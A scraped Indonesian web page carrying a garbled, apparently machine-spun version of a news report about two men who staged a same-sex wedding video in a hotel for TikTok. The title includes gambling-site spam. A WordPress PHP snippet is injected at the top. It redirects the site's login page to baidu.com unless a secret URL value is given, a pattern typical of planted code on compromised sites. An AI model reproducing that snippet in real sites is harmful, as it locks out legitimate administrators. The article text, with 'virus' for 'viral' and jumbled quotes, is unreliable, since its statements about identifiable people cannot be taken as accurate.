//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Virus 2 pria membuat video pernikahan serupa di TikTok, rupanya mencari perasaan yang bisa menambah pengikut | daftar s128_www.s1288.net_s1288 net

TRIBUNNEWS.COM-Dua pria menyebarkan virus di media sosial di sebuah hotel dan membuat konten pernikahan gay di sebuah hotel-usai investigasi, juru kamera mengaku membuat konten yang sensasional.

Mereka ingin pelanggan TikTok meningkat.

Dua pria puas dengan pernikahan sesama jenis di sebuah hotel di Bagansiapiapi, Rione Roy, dan dijaga oleh polisi. -Inisial kedua pria itu adalah AD (25) dan mereka adalah penduduk Royle. , Dan warga Pekanbaru NF (26). – “Ya kami lindungi dan diperiksa,” kata Kapolres Rohil AKBP Nurhadi Ismanto, Minggu (20/9/2020). Kepada polisi, keduanya mengaku bahwa video dan fotonya diambil pada Rabu (2020/9/16) lalu di sebuah hotel di Bagansiapiapi.

Lalu pada Jumat (18/9/2020), hal itu menjadi heboh di media sosial.

Baca: Video Viral Sopir Terombang-ambing dan Terjatuh Akibat Jalanan Tidak Rata di Cilandak, Pemeliharaan Desa

Bacaan: Virus Penjual Bubur Kacang Hijau Fasih Berbahasa Jepang di Surabaya, Berikut Faktanya-Bacaannya: Ahli Mengatakan, Wargane menyayangkan ketagihan nonton film porno, yang paling parah Nurhadi, video dan fotonya diunggah ke akun TikTok milik NF.

“Setelah mereka masuk hotel, saat itu tidak ada pernikahan sesama jenis. Nurhadi mengatakan, ini hanya sebatas satu foto dan berlangsung hingga malam ultah temannya.

Add Comment

Your email address will not be published. Required fields are marked *